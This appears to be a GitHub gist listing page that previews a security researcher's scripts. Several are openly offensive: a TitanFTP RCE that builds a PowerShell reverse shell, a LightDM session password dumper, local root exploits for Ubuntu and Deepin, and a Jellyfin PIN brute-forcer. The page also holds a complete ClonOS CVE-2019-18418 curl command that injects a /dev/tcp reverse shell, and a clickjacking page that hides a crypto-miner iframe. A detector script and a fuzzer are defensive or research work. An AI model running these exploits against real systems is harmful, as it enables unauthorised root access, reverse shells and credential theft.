View linux-pam-backdoor-detect.sh
#!/bin/bash | |
# Detect PAM backdoors created by linux-pam-backdoor: | |
# https://github.com/zephrax/linux-pam-backdoor | |
# | |
# Note: this will likely only work with PAM version 1.3.0. | |
# --- | |
# $ ./backdoor.sh -v 1.3.0 -p some_s3cr3t_p455word | |
# Automatic PAM Backdoor | |
# PAM Version: 1.3.0 | |
# Password: some_s3cr3t_p455word |
View titanftp-server-admin-event-handler-rce
#!/bin/bash | |
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE | |
# | |
# Requires remote administration interface to be enabled. (Default port 31001/tcp). | |
# Creates a new server and adds an event handler to execute a PowerShell reverse shell. | |
# --- | |
# $ ./titanftp-server-admin-event-handler-rce | |
# TitanFTP Server Administrator Event Handler Authenticated RCE | |
# | |
# Generating PowerShell reverse shell to 172.16.191.165:1337 ... |
View clonos-root-rce.sh
#!/bin/bash | |
# clonos-root-rce | |
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker | |
# Note: Start netcat listener on LHOST:LPORT first | |
RHOST="172.16.191.240" | |
LHOST="172.16.191.165" | |
LPORT=1337 | |
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`" |
View jellyfin-brute.rb
#!/usr/bin/env ruby | |
################################################################################ | |
# Jellyfin Password Reset PIN Brute Force # | |
# # | |
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. # | |
# This will likely also work on Emby Media Server, but untested. # | |
# # | |
# Note: cURL must be installed and in $PATH # | |
# # | |
# Note: Upon successful expoitation, the password will be reset for all users, # |
View lightdmpwn.sh
#!/bin/bash | |
# Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358) | |
# --- | |
# Usage: ./lightpwn | |
# A LightDM session is required. Exploitation will lock the current session, | |
# and could take several minutes. It usually takes about a minute. | |
# When the screen stops flashing, unlock the session and run: /bin/subash | |
# --- | |
# There's nothing new or special about this exploit. | |
# It's simply a slightly more weaponised version of the original PoC, |
View lastore-daemon-root.sh
#!/bin/bash | |
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit | |
# | |
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user | |
# in the sudo group to install arbitrary packages without providing a password, | |
# resulting in code execution as root. By default, the first user created on | |
# the system is a member of the sudo group. | |
# ~ bcoles | |
# | |
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/ |
View lightdmdump
#!/bin/bash | |
# lightdmdump | |
# --- | |
# Dump clear text passwords from lightdm sessions on Ubuntu | |
# Requires root privileges to dump lightdm process memory | |
# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS | |
# --- | |
# Bug discovered by: Sven Blumenstein | |
# Disclosure date: 2017-09-15 | |
# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490 |
View crt.sh
#!/bin/bash | |
# List sub-domains using crt.sh | |
set -euo pipefail | |
IFS=$'\n\t' | |
error() { | |
echo "[ERROR] $*" | |
exit 1 | |
} |
View fuzz.rb
#!/usr/bin/env ruby | |
################################################### | |
# ----------------------------------------------- # | |
# Fuzz Origami Ruby gem with mutated PDF files # | |
# ----------------------------------------------- # | |
# # | |
# Each test case is written to 'fuzz.pdf' in the # | |
# current working directory. # | |
# # | |
# Crashes and the associated backtrace are saved # |
View clickjack-authedmine.html
<html> | |
<body> | |
<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01"> | |
<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe> | |
</div> | |
</body> | |
<script> | |
window.onmousemove = function(e) { | |
var container = document.getElementById("container"); |
NewerOlder